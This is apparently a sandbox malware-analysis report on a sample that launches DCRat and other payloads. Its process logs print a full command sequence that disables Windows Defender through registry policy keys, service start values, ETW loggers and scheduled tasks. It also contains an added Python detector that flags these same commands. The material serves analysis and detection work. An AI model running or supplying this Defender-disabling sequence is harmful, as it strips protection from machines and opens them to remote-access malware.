Source: C:\Users\user\Desktop\FixTsDfhiC.exe  Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\windows defender.bat" "
Source: C:\Windows\SysWOW64\cmd.exe  Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe  Process created: C:\Windows\SysWOW64\reg.exe reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
Source: C:\Windows\SysWOW64\cmd.exe  Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
Source: C:\Windows\SysWOW64\cmd.exe  Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
Source: C:\Windows\SysWOW64\cmd.exe  Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
Source: C:\Windows\SysWOW64\cmd.exe  Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
Source: C:\Windows\SysWOW64\cmd.exe  Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
Source: C:\Windows\SysWOW64\cmd.exe  Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
Source: C:\Windows\SysWOW64\cmd.exe  Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
Source: C:\Windows\SysWOW64\cmd.exe  Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
Source: C:\Windows\SysWOW64\cmd.exe  Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
Source: C:\Windows\SysWOW64\cmd.exe  Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
Source: C:\Windows\SysWOW64\cmd.exe  Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
Source: C:\Windows\SysWOW64\cmd.exe  Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
Source: C:\Windows\SysWOW64\cmd.exe  Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
Source: C:\Windows\SysWOW64\cmd.exe  Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
Source: C:\Windows\SysWOW64\cmd.exe  Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
Source: C:\Windows\SysWOW64\cmd.exe  Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
Source: C:\Windows\SysWOW64\cmd.exe  Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
Source: C:\Windows\SysWOW64\cmd.exe  Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
Source: C:\Windows\SysWOW64\cmd.exe  Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
Source: C:\Windows\SysWOW64\cmd.exe  Process created: C:\Windows\SysWOW64\reg.exe reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
Source: C:\Windows\SysWOW64\cmd.exe  Process created: C:\Windows\SysWOW64\reg.exe reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
Source: C:\Windows\SysWOW64\cmd.exe  Process created: C:\Windows\SysWOW64\reg.exe reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
Source: C:\Windows\SysWOW64\cmd.exe  Process created: C:\Windows\SysWOW64\reg.exe reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
Source: C:\Windows\SysWOW64\cmd.exe  Process created: C:\Windows\SysWOW64\reg.exe reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
Source: C:\Windows\SysWOW64\cmd.exe  Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
Source: C:\Windows\SysWOW64\cmd.exe  Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
Source: C:\Windows\SysWOW64\cmd.exe  Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
Source: C:\Windows\SysWOW64\cmd.exe  Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
Source: C:\Windows\SysWOW64\cmd.exe  Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe  Process created: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exe "C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exe"
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exe  Process created: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe "C:\Users\user\AppData\Local\Temp\DCRatBuild.exe"
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exe  Process created: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe "C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe"
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe  Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\blockweb\J6PsSzBYKK7mXTJyYh2Tgne.vbe"
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe  Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\blockweb\file.vbs"
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe  Process created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" csproduct get uuid
Source: C:\Windows\System32\wbem\WMIC.exe  Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\wscript.exe  Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\blockweb\TOdra8QNG4wQEWkSimCHh9eVG.bat" "
Source: C:\Windows\SysWOW64\cmd.exe  Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe  Process created: C:\blockweb\portrefNet.exe "C:\blockweb\portrefNet.exe"
Source: C:\Users\user\Desktop\FixTsDfhiC.exe  Process created: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe "C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe"
Source: C:\Users\user\Desktop\FixTsDfhiC.exe  Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\windows defender.bat" "
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe  Process created: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exe "C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exe"
Source: C:\Windows\SysWOW64\cmd.exe  Process created: C:\Windows\SysWOW64\reg.exe reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
Source: C:\Windows\SysWOW64\cmd.exe  Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
Source: C:\Windows\SysWOW64\cmd.exe  Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
Source: C:\Windows\SysWOW64\cmd.exe  Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
Source: C:\Windows\SysWOW64\cmd.exe  Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
Source: C:\Windows\SysWOW64\cmd.exe  Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
Source: C:\Windows\SysWOW64\cmd.exe  Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
Source: C:\Windows\SysWOW64\cmd.exe  Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
Source: C:\Windows\SysWOW64\cmd.exe  Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
Source: C:\Windows\SysWOW64\cmd.exe  Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
Source: C:\Windows\SysWOW64\cmd.exe  Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
Source: C:\Windows\SysWOW64\cmd.exe  Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
Source: C:\Windows\SysWOW64\cmd.exe  Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
Source: C:\Windows\SysWOW64\cmd.exe  Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
Source: C:\Windows\SysWOW64\cmd.exe  Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
Source: C:\Windows\SysWOW64\cmd.exe  Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
Source: C:\Windows\SysWOW64\cmd.exe  Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
Source: C:\Windows\SysWOW64\cmd.exe  Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
Source: C:\Windows\SysWOW64\cmd.exe  Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
Source: C:\Windows\SysWOW64\cmd.exe  Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
Source: C:\Windows\SysWOW64\cmd.exe  Process created: C:\Windows\SysWOW64\reg.exe reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
Source: C:\Windows\SysWOW64\cmd.exe  Process created: C:\Windows\SysWOW64\reg.exe reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
Source: C:\Windows\SysWOW64\cmd.exe  Process created: C:\Windows\SysWOW64\reg.exe reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
Source: C:\Windows\SysWOW64\cmd.exe  Process created: C:\Windows\SysWOW64\reg.exe reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
Source: C:\Windows\SysWOW64\cmd.exe  Process created: C:\Windows\SysWOW64\reg.exe reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
Source: C:\Windows\SysWOW64\cmd.exe  Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
Source: C:\Windows\SysWOW64\cmd.exe  Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
Source: C:\Windows\SysWOW64\cmd.exe  Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
Source: C:\Windows\SysWOW64\cmd.exe  Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
Source: C:\Windows\SysWOW64\cmd.exe  Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exe  Process created: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe "C:\Users\user\AppData\Local\Temp\DCRatBuild.exe"
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exe  Process created: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe "C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe"
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe  Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\blockweb\J6PsSzBYKK7mXTJyYh2Tgne.vbe"
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe  Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\blockweb\file.vbs"
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe  Process created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" csproduct get uuid
Source: C:\Windows\SysWOW64\wscript.exe  Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\blockweb\TOdra8QNG4wQEWkSimCHh9eVG.bat" "
Source: C:\Windows\SysWOW64\cmd.exe  Process created: C:\blockweb\portrefNet.exe "C:\blockweb\portrefNet.exe"
Source: C:\blockweb\portrefNet.exe  Process created: unknown unknown
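The reg.exe and schtasks.exe children of "windows defender.bat" listed above are a complete Defender kill sequence: wipe and rewrite the policy tree (DisableAntiSpyware, real-time protection, SpyNet/MAPS), silence the DefenderApiLogger/DefenderAuditLogger ETW sessions, disable the Defender and Exploit Guard scheduled tasks, remove the SecurityHealth autostart and EPP shell handlers, and set the WdBoot/WdFilter/WdNisDrv/WdNisSvc/WinDefend services to Start=4 (disabled). All of it needs administrative rights, and with Tamper Protection enabled Defender ignores the policy values and restores its services, so the commands are best treated as a high-fidelity signal of intent rather than as proof that Defender went down. The detector below is an added example written for this page, not code from Joe Sandbox or from the sample: it classifies process-creation command lines (the same strings Sysmon Event ID 1 or Security Event ID 4688 record) into the tampering categories seen here. The sample input is constructed from the report's own command lines plus one benign policy write as a control; the category names are the example's own.

```python
"""Flag Windows Defender tampering in process-creation command lines.

Added example for this report, not code from Joe Sandbox or from the sample.
SAMPLE_COMMAND_LINES is constructed from the reg.exe / schtasks.exe children
of "windows defender.bat" shown in the report; in production the same strings
come from Sysmon Event ID 1 or Security Event ID 4688 CommandLine fields.
"""
import re
from collections import Counter
from typing import NamedTuple, Optional


class Finding(NamedTuple):
    category: str  # which Defender component the command neutralises
    detail: str    # key\value=data, service name or task path that was touched
    command: str   # raw command line, kept for the analyst


# Policy tree Defender reads when Tamper Protection is off.
DEFENDER_POLICY = r"hklm\software\policies\microsoft\windows defender"
SERVICES_ROOT = "hklm\\system\\currentcontrolset\\services\\"
DEFENDER_SERVICES = {"wdboot", "wdfilter", "wdnisdrv", "wdnissvc", "windefend"}
DEFENDER_TASK_PREFIXES = (r"microsoft\windows\windows defender", r"microsoft\windows\exploitguard")

_TOKEN = re.compile(r'"([^"]*)"|(\S+)')


def tokenize(cmdline: str) -> list:
    """Split a Windows command line, keeping double-quoted arguments whole."""
    return [quoted if quoted else bare for quoted, bare in _TOKEN.findall(cmdline)]


def _switch_arg(tokens: list, switch: str) -> Optional[str]:
    """Return the argument after a case-insensitive switch such as /v or /TN."""
    for i, tok in enumerate(tokens[:-1]):
        if tok.lower() == switch:
            return tokens[i + 1]
    return None


def classify(cmdline: str) -> Optional[Finding]:
    """Map one command line to a Finding, or None if it does not touch Defender."""
    tokens = tokenize(cmdline)
    if len(tokens) < 3:
        return None
    exe = tokens[0].lower().rsplit("\\", 1)[-1]   # strip any directory prefix
    verb = tokens[1].lower()
    target, low = tokens[2], tokens[2].lower()
    if exe in ("reg", "reg.exe") and verb in ("add", "delete"):
        value_raw = _switch_arg(tokens, "/v")
        value = (value_raw or "").lower()
        data = _switch_arg(tokens, "/d")
        leaf = low.rsplit("\\", 1)[-1]            # last path component of the key
        if low.startswith(DEFENDER_POLICY):
            detail = f"{target}\\{value_raw}={data}" if value_raw else target
            return Finding("defender_policy", detail, cmdline)
        if low.startswith(SERVICES_ROOT) and leaf in DEFENDER_SERVICES and value == "start" and data == "4":
            return Finding("defender_service_disabled", leaf, cmdline)  # Start=4 is SERVICE_DISABLED
        if "\\autologger\\defender" in low and value == "start" and data == "0":
            return Finding("defender_etw_logger_off", leaf, cmdline)
        if verb == "delete" and value == "securityhealth":
            return Finding("securityhealth_autostart_removed", target, cmdline)
        if verb == "delete" and low.endswith(r"\shellex\contextmenuhandlers\epp"):
            return Finding("defender_shell_handler_removed", target, cmdline)
    if exe in ("schtasks", "schtasks.exe") and verb == "/change":
        task = _switch_arg(tokens, "/tn") or ""
        if "/disable" in (t.lower() for t in tokens) and task.lower().startswith(DEFENDER_TASK_PREFIXES):
            return Finding("defender_task_disabled", task, cmdline)
    return None


SAMPLE_COMMAND_LINES = [  # constructed from the report's process-creation lines
    r'reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f',
    r'reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f',
    r'reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f',
    r'reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f',
    r'reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f',
    r'schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable',
    r'schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable',
    r'reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f',
    r'reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f',
    r'reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f',
    r'reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f',
    # benign control (constructed): a policy write outside the Defender tree must not fire
    r'reg add "HKLM\Software\Policies\Microsoft\Windows\Explorer" /v "NoRun" /t REG_DWORD /d "1" /f',
]


def scan(cmdlines) -> list:
    """Return a Finding for every command line that tampers with Defender."""
    return [f for f in map(classify, cmdlines) if f is not None]


def summarize(findings) -> dict:
    """Count findings per category; several categories under one parent cmd.exe is the alert."""
    return dict(Counter(f.category for f in findings))


if __name__ == "__main__":
    hits = scan(SAMPLE_COMMAND_LINES)
    for hit in hits:
        print(f"{hit.category:34} {hit.detail}")
    print(summarize(hits))
```

Grouping by parent process matters more than any single line: one reg add against the policy tree can be an administrator, but six categories from one cmd.exe launched out of %TEMP% is the pattern above. Matching on the tokenised key path rather than on substrings keeps the benign control (a policy write under Microsoft\Windows\Explorer) silent.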
Source: C:\Users\user\Desktop\FixTsDfhiC.exe  Section loaded: apphelp.dll, shfolder.dll, windows.storage.dll, wldp.dll, kernel.appcore.dll, uxtheme.dll, propsys.dll, profapi.dll, windows.staterepositoryps.dll, edputil.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, sspicli.dll, wintypes.dll, appresolver.dll, bcp47langs.dll, slc.dll, userenv.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe  Section loaded: apphelp.dll, shfolder.dll, wtsapi32.dll, windows.storage.dll, wldp.dll, kernel.appcore.dll, uxtheme.dll, propsys.dll, profapi.dll, windows.staterepositoryps.dll, edputil.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, sspicli.dll, wintypes.dll, appresolver.dll, bcp47langs.dll, slc.dll, userenv.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\cmd.exe  Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\schtasks.exe  Section loaded: kernel.appcore.dll, taskschd.dll, sspicli.dll  (same three modules in each of the five schtasks.exe instances)
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exe | Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exe | Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exe | Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exe | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exe | Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exe | Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exe | Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exe | Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exe | Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exe | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exe | Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exe | Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exe | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exe | Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Section loaded: api-ms-win-core-synch-l1-2-0.dll
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Section loaded: api-ms-win-core-fibers-l1-1-1.dll
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Section loaded: api-ms-win-core-synch-l1-2-0.dll
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Section loaded: api-ms-win-core-fibers-l1-1-1.dll
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Section loaded: api-ms-win-core-localization-l1-2-1.dll
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Section loaded: dxgidebug.dll
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Section loaded: sfc_os.dll
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Section loaded: dwmapi.dll
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Section loaded: riched20.dll
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Section loaded: usp10.dll
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Section loaded: msls31.dll
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Section loaded: policymanager.dll
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Section loaded: msvcp110_win.dll
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Section loaded: bcp47langs.dll
